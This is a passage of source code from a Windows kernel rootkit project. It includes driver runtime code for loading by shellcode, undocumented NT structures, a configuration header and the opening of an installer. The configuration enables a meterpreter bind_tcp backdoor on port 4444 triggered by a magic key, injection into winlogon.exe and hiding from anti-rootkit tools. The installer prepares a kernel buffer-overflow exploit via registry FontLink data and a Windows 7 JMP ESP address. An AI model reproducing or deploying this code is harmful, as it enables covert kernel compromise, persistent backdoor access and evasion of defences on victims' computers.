asModuleName; UNICODE_STRING usModuleName; RtlInitAnsiString(&asModuleName, ModuleName); NTSTATUS ns = RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE); if (NT_SUCCESS(ns)) { for (ULONG i = 0; i < Info->NumberOfModules; i++) { ANSI_STRING asEnumModuleName; UNICODE_STRING usEnumModuleName; RtlInitAnsiString( &asEnumModuleName, (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName ); NTSTATUS ns = RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE); if (NT_SUCCESS(ns)) { if (RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE)) { // hal.dll passed as module name for (int i_m = 0; i_m < HAL_NAMES_NUM; i_m++) { UNICODE_STRING usHalName; RtlInitUnicodeString(&usHalName, wcHalNames[i_m]); // compare module name from list with known HAL module name if (RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE)) { pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE)) { // ntoskrnl.exe passed as module name for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++) { UNICODE_STRING usNtName; RtlInitUnicodeString(&usNtName, wcNtNames[i_m]); // compare module name from list with known kernel module name if (RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE)) { pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE)) { pModuleBase = (PVOID)Info->Modules[i].ImageBase; } RtlFreeUnicodeString(&usEnumModuleName); if (pModuleBase) { // module is found break; } } } RtlFreeUnicodeString(&usModuleName); } ExFreePool(Info); } return pModuleBase; } //-------------------------------------------------------------------------------------- BOOLEAN RuntimeInitialize( PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { if (DriverObject == NULL) { /** * Driver has been loaded by shellcode. * RegistryPath - pointer to the SC_PARAMS */ PSC_PARAMS ShellcodeParams = (PSC_PARAMS)RegistryPath; // parse image relocations if (!RuntimeProcessRelocs( ShellcodeParams->rootkit_base, ShellcodeParams->rootkit_base)) { return FALSE; } /* Safe to use global variables here. */ m_KernelBase = ShellcodeParams->kernel_base; m_DriverBase = ShellcodeParams->rootkit_base; // parse image imports (kernel) if (!RuntimeProcessImports( ShellcodeParams->rootkit_base, "ntoskrnl.exe", ShellcodeParams->kernel_base)) { return FALSE; } /* Safe to use kernel imports here. */ DbgMsg(__FUNCTION__"(): Kernel base is "IFMT"\n", m_KernelBase); PVOID NdisBase = RuntimeGetKernelModuleBase("ndis.sys"); if (NdisBase) { DbgMsg(__FUNCTION__"(): NDIS base is "IFMT"\n", NdisBase); // parse image imports (NDIS) if (!RuntimeProcessImports( ShellcodeParams->rootkit_base, "ndis.sys", NdisBase)) { return FALSE; } } else { DbgMsg(__FUNCTION__"() ERROR: Unable to locate NDIS\n"); return FALSE; } /* Safe to use all others imports here. */ } // driver has been loaded as usual return TRUE; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/runtime.h ================================================ extern "C" { size_t my_strlen(const char *str); int my_strcmp(const char *str_1, const char *str_2); char *my_strcpy(char *str_1, const char *str_2); char *my_strlwr(char *str); wchar_t chrlwr_w(wchar_t chr); BOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive); PVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass); PVOID RuntimeGetKernelModuleBase(char *ModuleName); PVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName); BOOLEAN RuntimeProcessImports(PVOID Image, PVOID KernelAddress); BOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase); BOOLEAN RuntimeInitialize( PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath ); } ================================================ FILE: src/rootkit_driver/stdafx.h ================================================ #pragma warning(disable: 4200) extern "C" { #include #include #include #include #include "undocnt.h" } #include "debug.h" #include "runtime.h" #include "ndis_hook.h" #include "network.h" #include "rootkit_driver.h" #include "dll_inject.h" #include "../common/common.h" #include "../rootkit_driver_config.h" ================================================ FILE: src/rootkit_driver/undocnt.h ================================================ // ******************************************************** // some user-mode structures typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; LIST_ENTRY HashLinks; PVOID SectionPointer; ULONG CheckSum; ULONG TimeDateStamp; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY ModuleListLoadOrder; LIST_ENTRY ModuleListMemoryOrder; LIST_ENTRY ModuleListInitOrder; } PEB_LDR_DATA, *PPEB_LDR_DATA; // ******************************************************** typedef struct SERVICE_DESCRIPTOR_ENTRY { PVOID *ServiceTableBase; PULONG ServiceCounterTableBase; ULONG NumberOfServices; PUCHAR ParamTableBase; } SERVICE_DESCRIPTOR_ENTRY, *PSERVICE_DESCRIPTOR_ENTRY; typedef struct _SERVICE_DESCRIPTOR_TABLE { SERVICE_DESCRIPTOR_ENTRY Entry[2]; } SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE; typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, // obsolete...delete SystemPerformanceInformation, SystemTimeOfDayInformation, SystemPathInformation, SystemProcessInformation, SystemCallCountInformation, SystemDeviceInformation, SystemProcessorPerformanceInformation, SystemFlagsInformation, SystemCallTimeInformation, SystemModuleInformation, SystemLocksInformation, SystemStackTraceInformation, SystemPagedPoolInformation, SystemNonPagedPoolInformation, SystemHandleInformation, SystemObjectInformation, SystemPageFileInformation, SystemVdmInstemulInformation, SystemVdmBopInformation, SystemFileCacheInformation, SystemPoolTagInformation, SystemInterruptInformation, SystemDpcBehaviorInformation, SystemFullMemoryInformation, SystemLoadGdiDriverInformation, SystemUnloadGdiDriverInformation, SystemTimeAdjustmentInformation, SystemSummaryMemoryInformation, SystemMirrorMemoryInformation, SystemPerformanceTraceInformation, SystemObsolete0, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation, SystemExtendServiceTableInformation, SystemPrioritySeperation, SystemVerifierAddDriverInformation, SystemVerifierRemoveDriverInformation, SystemProcessorIdleInformation, SystemLegacyDriverInformation, SystemCurrentTimeZoneInformation, SystemLookasideInformation, SystemTimeSlipNotification, SystemSessionCreate, SystemSessionDetach, SystemSessionInformation, SystemRangeStartInformation, SystemVerifierInformation, SystemVerifierThunkExtend, SystemSessionProcessInformation, SystemLoadGdiDriverInSystemSpace, SystemNumaProcessorMap, SystemPrefetcherInformation, SystemExtendedProcessInformation, SystemRecommendedSharedDataAlignment, SystemComPlusPackage, SystemNumaAvailableMemory, SystemProcessorPowerInformation, SystemEmulationBasicInformation, SystemEmulationProcessorInformation, SystemExtendedHandleInformation, SystemLostDelayedWriteInformation, SystemBigPoolInformation, SystemSessionPoolTagInformation, SystemSessionMappedViewInformation, SystemHotpatchInformation, SystemObjectSecurityMode, SystemWatchdogTimerHandler, SystemWatchdogTimerInformation, SystemLogicalProcessorInformation, SystemWow64SharedInformation, SystemRegisterFirmwareTableInformationHandler, SystemFirmwareTableInformation, SystemModuleInformationEx, SystemVerifierTriageInformation, SystemSuperfetchInformation, SystemMemoryListInformation, SystemFileCacheInformationEx, MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum } SYSTEM_INFORMATION_CLASS; typedef struct _RTL_PROCESS_MODULE_INFORMATION { HANDLE Section; // Not filled in PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[ 256 ]; } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; typedef struct _RTL_PROCESS_MODULES { ULONG NumberOfModules; RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ]; } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess; } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ]; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef struct _FILE_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; WCHAR FileName[1]; } FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; typedef struct _FILE_FULL_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; WCHAR FileName[1]; } FILE_FULL_DIRECTORY_INFORMATION, *PFILE_FULL_DIRECTORY_INFORMATION; typedef struct _FILE_BOTH_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG Unknown; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaInformationLength; UCHAR AlternateNameLength; WCHAR AlternateName[12]; WCHAR FileName[1]; } FILE_BOTH_DIRECTORY_INFORMATION, *PFILE_BOTH_DIRECTORY_INFORMATION; typedef struct _FILE_NAMES_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; ULONG FileNameLength; WCHAR FileName[1]; } FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; typedef struct _FILE_ID_BOTH_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; CCHAR ShortNameLength; WCHAR ShortName[12]; LARGE_INTEGER FileId; WCHAR FileName[1]; } FILE_ID_BOTH_DIRECTORY_INFORMATION, *PFILE_ID_BOTH_DIRECTORY_INFORMATION; typedef struct _FILE_ID_FULL_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; LARGE_INTEGER FileId; WCHAR FileName[1]; } FILE_ID_FULL_DIRECTORY_INFORMATION, *PFILE_ID_FULL_DIRECTORY_INFORMATION; typedef struct _SYSTEM_OBJECT_TYPE_INFORMATION { ULONG NextEntryOffset; ULONG ObjectCount; ULONG HandleCount; ULONG TypeNumber; ULONG InvalidAttributes; GENERIC_MAPPING GenericMapping; ACCESS_MASK ValidAccessMask; POOL_TYPE PoolType; UCHAR Unknown; UNICODE_STRING Name; } SYSTEM_OBJECT_TYPE_INFORMATION, *PSYSTEM_OBJECT_TYPE_INFORMATION; typedef struct _SYSTEM_OBJECT_INFORMATION { ULONG NextEntryOffset; PVOID Object; ULONG CreatorProcessId; USHORT Unknown; USHORT Flags; ULONG PointerCount; ULONG HandleCount; ULONG PagedPoolUsage; ULONG NonPagedPoolUsage; ULONG ExclusiveProcessId; PSECURITY_DESCRIPTOR SecurityDescriptor; UNICODE_STRING Name; } SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION; NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile( HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG FileInformationLength, FILE_INFORMATION_CLASS FileInformationClass, BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan ); typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryOffset; ULONG NumberOfThreads; LARGE_INTEGER SpareLi1; LARGE_INTEGER SpareLi2; LARGE_INTEGER SpareLi3; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ImageName; KPRIORITY BasePriority; HANDLE UniqueProcessId; HANDLE InheritedFromUniqueProcessId; ULONG HandleCount; ULONG SessionId; ULONG_PTR PageDirectoryBase; SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; SIZE_T PrivatePageCount; LARGE_INTEGER ReadOperationCount; LARGE_INTEGER WriteOperationCount; LARGE_INTEGER OtherOperationCount; LARGE_INTEGER ReadTransferCount; LARGE_INTEGER WriteTransferCount; LARGE_INTEGER OtherTransferCount; } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; typedef struct THREAD_BASIC_INFORMATION { NTSTATUS ExitStatus; PVOID TebBaseAddress; CLIENT_ID ClientId; KAFFINITY AffinityMask; KPRIORITY Priority; KPRIORITY BasePriority; } THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION; typedef enum { StateInitialized, StateReady, StateRunning, StateStandby, StateTerminated, StateWait, StateTransition, StateUnknown } THREAD_STATE; typedef struct _SYSTEM_THREAD { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; THREAD_STATE State; KWAIT_REASON WaitReason; } SYSTEM_THREAD, *PSYSTEM_THREAD; typedef struct _SYSTEM_PROCESSES_INFORMATION { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved1[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; SYSTEM_THREAD Threads[1]; } SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION; NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); NTSYSAPI NTSTATUS NTAPI ZwQueryInformationProcess( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength ); NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect ); NTSYSAPI NTSTATUS NTAPI ZwFreeVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, PULONG FreeSize, ULONG FreeType ); NTSYSAPI NTSTATUS NTAPI ZwOpenThread( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId ); NTSYSAPI NTSTATUS NTAPI ZwDeviceIoControlFile( HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, ULONG IoControlCode, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength ); NTSYSAPI NTSTATUS NTAPI ZwFsControlFile( HANDLE FileHandle, HANDLE Event OPTIONAL, PIO_APC_ROUTINE ApcRoutine OPTIONAL, PVOID ApcContext OPTIONAL, PIO_STATUS_BLOCK IoStatusBlock, ULONG FsControlCode, PVOID InputBuffer OPTIONAL, ULONG InputBufferLength, PVOID OutputBuffer OPTIONAL, ULONG OutputBufferLength ); NTSYSAPI NTSTATUS NTAPI ZwSaveKey( HANDLE KeyHandle, HANDLE FileHandle ); NTSYSAPI NTSTATUS NTAPI ZwQueryVolumeInformationFile( HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FsInformation, ULONG Length, FS_INFORMATION_CLASS FsInformationClass ); NTSYSAPI NTSTATUS NTAPI ZwQuerySecurityObject( HANDLE Handle, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR SecurityDescriptor, ULONG Length, PULONG LengthNeeded ); NTSYSAPI NTSTATUS NTAPI ZwSetSecurityObject( HANDLE Handle, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR SecurityDescriptor ); NTSYSAPI NTSTATUS NTAPI ZwDuplicateObject( HANDLE SourceProcessHandle, HANDLE SourceHandle, HANDLE TargetProcessHandle, PHANDLE TargetHandle, ACCESS_MASK DesiredAccess, ULONG HandleAttributes, ULONG Options ); NTSYSAPI NTSTATUS NTAPI ZwCreateEvent( PHANDLE EventHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, EVENT_TYPE EventType, BOOLEAN InitialState ); NTSYSAPI NTSTATUS NTAPI ZwWaitForSingleObject( HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout ); NTSYSAPI NTSTATUS NTAPI RtlGetDaclSecurityDescriptor( PSECURITY_DESCRIPTOR SecurityDescriptor, PBOOLEAN DaclPresent, PACL *Dacl, PBOOLEAN DaclDefaulted ); #ifndef __wtypes_h__ typedef struct _SID_IDENTIFIER_AUTHORITY { UCHAR Value[ 6 ]; } SID_IDENTIFIER_AUTHORITY; typedef struct _SID_IDENTIFIER_AUTHORITY *PSID_IDENTIFIER_AUTHORITY; #endif NTSYSAPI NTSTATUS NTAPI RtlInitializeSid( PSID Sid, PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, UCHAR SubAuthorityCount ); NTSYSAPI ULONG NTAPI RtlLengthSid( PSID Sid ); NTSYSAPI NTSTATUS NTAPI RtlAddAccessAllowedAce( PACL Acl, ULONG AceRevision, ACCESS_MASK AccessMask, PSID Sid ); NTSYSAPI NTSTATUS NTAPI RtlSetDaclSecurityDescriptor( OUT PSECURITY_DESCRIPTOR SecurityDescriptor, BOOLEAN DaclPresent, PACL Dacl, BOOLEAN DaclDefaulted ); NTSYSAPI NTSTATUS NTAPI RtlSelfRelativeToAbsoluteSD2( PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor, PULONG pBufferSize ); NTSYSAPI BOOLEAN NTAPI RtlValidSid( PSID Sid ); typedef struct _KAPC_STATE { LIST_ENTRY ApcListHead[2]; PVOID Process; BOOLEAN KernelApcInProgress; BOOLEAN KernelApcPending; BOOLEAN UserApcPending; } KAPC_STATE, *PKAPC_STATE; NTSYSAPI VOID NTAPI KeStackAttachProcess( PEPROCESS Process, PKAPC_STATE ApcState ); NTSYSAPI VOID NTAPI KeUnstackDetachProcess( PKAPC_STATE ApcState ); NTSYSAPI NTSTATUS NTAPI PsLookupProcessByProcessId( HANDLE ProcessId, PEPROCESS *Process ); NTSYSAPI NTSTATUS NTAPI PsLookupThreadByThreadId( HANDLE ThreadId, PETHREAD *Thread ); NTSYSAPI NTSTATUS NTAPI ObOpenObjectByPointer( PVOID Object, ULONG HandleAttributes, PACCESS_STATE PassedAccessState, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PHANDLE Handle ); NTSYSAPI NTSTATUS NTAPI ObOpenObjectByName( POBJECT_ATTRIBUTES ObjectAttributes, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PACCESS_STATE AccessState, ACCESS_MASK DesiredAccess, PVOID ParseContext, PHANDLE Handle ); NTSYSAPI NTSTATUS NTAPI ObReferenceObjectByName( PUNICODE_STRING ObjectPath, ULONG Attributes, PACCESS_STATE PassedAccessState, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PVOID ParseContext, PVOID *ObjectPtr ); NTKERNELAPI NTSTATUS ObQueryNameString( PVOID Object, POBJECT_NAME_INFORMATION ObjectNameInfo, ULONG Length, PULONG ReturnLength ); NTKERNELAPI VOID KeSetSystemAffinityThread( KAFFINITY Affinity ); typedef enum { OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment } KAPC_ENVIRONMENT; NTKERNELAPI VOID KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ApcMode, PVOID NormalContext ); NTKERNELAPI BOOLEAN KeInsertQueueApc( PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, KPRIORITY Increment ); ================================================ FILE: src/rootkit_driver_config.h ================================================ /** * Hide rootkit executable memory in discardable sections to avoid * 'hiiden code' detection from different anti-rootkits. */ #define USE_STEALTH_IMAGE /** * Magic sequence that activates meterpreter/bind_tcp backdoor on 4444 port. * Use rootkit_ping.py script for communicating with the infected target. */ #define ROOTKIT_CTL_KEY "7C5E3380" /** * Process to inject meterpreter DLL. */ #define METERPRETER_PROCESS L"winlogon.exe" ================================================ FILE: src/rootkit_installer/rootkit_installer.cpp ================================================ #include "stdafx.h" #define EMIT(_data_) __asm __emit _data_ #define _ __asm __emit #define ENDM 'DNE~' #ifdef USE_DEBUG_DRIVER #include "../includes/rootkit_driver_debug.sys.h" #else #include "../includes/rootkit_driver.sys.h" #endif // buffer lengt and return address offset #define BOF_MIN_LENGTH (0x05 * sizeof(PVOID)) #define BOF_RET_OFFSET (BOF_MIN_LENGTH - sizeof(PVOID)) // registry key and value name for malformed exploit data + 1-st shellcode #define EXPL_KEY "Software\\Microsoft\\Windows NT\\CurrentVersion\\FontLink" #define EXPL_VAL "FontLinkDefaultChar" #define SC2_KEY "System\\CurrentControlSet\\Control" #define SC2_VAL "Configuration Data" /** * Name of registry value in System\CurrentControlSet\Control, to store * rootkit driver image. */ #define DRV_VAL "PCI" // Define the page size for the Intel 386 as 4096 (0x1000). #define PAGE_SIZE 0x1000 /** * OS sensitive addresses and offsets. */ // magic address of JMP ESP for Windows 7 SP0-SP1 #define JMP_ESP_ADDR 0xffdf04c7 // offset of _KPCR::KdVersionBlock #define KPCR_KdVersionBlock 0x34 #define KPCR_SelfPcr 0x1c #define PROCESSINFO_Flags 0x08 #define WIN32_PROCESS_FLAGS 0x20040010 /** * Virtual address inside of %SystemRoot%\Config\SYSTEM registry * hive, that mapped into the kernel memory. */ #define REG_HIVE_ADDRESS 0x8d100000 #define REG_SIGN_1 '\x40\x50\x41\x51' #define REG_SIGN_FULL "\x40\x50\x41\x51\x90" BOOL m_DebugBreaks = TRUE; //-------------------------------------------------------------------------------------- BOOL LoadPrivileges(char *lpszName) { HANDLE hToken = NULL; LUID Val; TOKEN_PRIVILEGES tp; BOOL bRet = FALSE; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { DbgMsg(__FILE__, __LINE__, "OpenProcessToken() fails: error %d\n", GetLastError()); goto end; } if (!LookupPrivilegeValueA(NULL, lpszName, &Val)) { DbgMsg(__FILE__, __LINE__, "LookupPrivilegeValue() fails: error %d\n", GetLastError()); goto end; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = Val; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof (tp), NULL, NULL)) { DbgMsg(__FILE__, __LINE__, "AdjustTokenPrivileges() fails: error %d\n", GetLastError()); goto end; } bRet = TRUE; end: if (hToken) { CloseHandle(hToken); } return bRet; } //-------------------------------------------------------------------------------------- PVOID GetSysInf(SYSTEM_INFORMATION_CLASS InfoClass) { NTSTATUS ns = 0; ULONG RetSize = 0, Size = 0x100; PVOID Info = NULL; GET_NATIVE(NtQuerySystemInformation); while (true) { // allocate memory for system information if ((Info = LocalAlloc(LMEM_FIXED | LMEM_ZEROINIT, Size)) == NULL) { DbgMsg(__FILE__, __LINE__, "LocalAlloc() fails\n"); return NULL; } // query information RetSize = 0; ns = f_NtQuerySystemInformation(InfoClass, Info, Size, &RetSize); if (ns == STATUS_INFO_LENGTH_MISMATCH) { // buffer is too small LocalFree(Info); Info = NULL; if (RetSize > 0) { // allocate more memory and try again Size = RetSize + 0x100; } else { break; } } else { break; } } if (!NT_SUCCESS(ns)) { DbgMsg(__FILE__, __LINE__, "NtQuerySystemInformation() fails; status: 0x%.8x\n", ns); if (Info) { LocalFree(Info); } return NULL; } return Info; } //-------------------------------------------------------------------------------------- PVOID KernelGetModuleBase(char *ModuleName, char *ModulePath, SIZE_T ModulePathLen) { PVOID pModuleBase = NULL; UNICODE_STRING usCommonHalName, usCommonNtName; GET_NATIVE(RtlInitUnicodeString); GET_NATIVE(RtlAnsiStringToUnicodeString); GET_NATIVE(RtlInitAnsiString); GET_NATIVE(RtlEqualUnicodeString); GET_NATIVE(RtlFreeUnicodeString); f_RtlInitUnicodeString(&usCommonHalName, L"hal.dll"); f_RtlInitUnicodeString(&usCommonNtName, L"ntoskrnl.exe"); #define HAL_NAMES_NUM 6 wchar_t *wcHalNames[] = { L"hal.dll", // Non-ACPI PIC HAL L"halacpi.dll", // ACPI PIC HAL L"halapic.dll", // Non-ACPI APIC UP HAL L"halmps.dll", // Non-ACPI APIC MP HAL L"halaacpi.dll", // ACPI APIC UP HAL L"halmacpi.dll" // ACPI APIC MP HAL }; #define NT_NAMES_NUM 4 wchar_t *wcNtNames[] = { L"ntoskrnl.exe", // UP L"ntkrnlpa.exe", // UP PAE L"ntkrnlmp.exe", // MP L"ntkrpamp.exe" // MP PAE }; PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)GetSysInf(SystemModuleInformation); if (Info) { ANSI_STRING asModuleName; UNICODE_STRING usModuleName; f_RtlInitAnsiString(&asModuleName, ModuleName); NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE); if (NT_SUCCESS(ns)) { for (ULONG i = 0; i < Info->NumberOfModules; i++) { ANSI_STRING asEnumModuleName; UNICODE_STRING usEnumModuleName; f_RtlInitAnsiString( &asEnumModuleName, (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName ); NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE); if (NT_SUCCESS(ns)) { if (f_RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE)) { // hal.dll passed as module name for (int i_m = 0; i_m < HAL_NAMES_NUM; i_m++) { UNICODE_STRING usHalName; f_RtlInitUnicodeString(&usHalName, wcHalNames[i_m]); // compare module name from list with known HAL module name if (f_RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE)) { lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen); pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (f_RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE)) { // ntoskrnl.exe passed as module name for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++) { UNICODE_STRING usNtName; f_RtlInitUnicodeString(&usNtName, wcNtNames[i_m]); // compare module name from list with known kernel module name if (f_RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE)) { lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen); pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (f_RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE)) { lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen); pModuleBase = (PVOID)Info->Modules[i].ImageBase; } f_RtlFreeUnicodeString(&usEnumModuleName); if (pModuleBase) { // module is found break; } } } f_RtlFreeUnicodeString(&usModuleName); } LocalFree(Info); } return pModuleBase; } //-------------------------------------------------------------------------------------- #define GetKernelProcAddr(_proc_) GetKernelProcAddrEx("ntoskrnl.exe", (_proc_), FALSE) #define GetHalProcAddr(_proc_) GetKernelProcAddrEx("hal.dll", (_proc_), FALSE) #define GetKernelProcOffset(_proc_) GetKernelProcAddrEx("ntoskrnl.exe", (_proc_), TRUE) #define 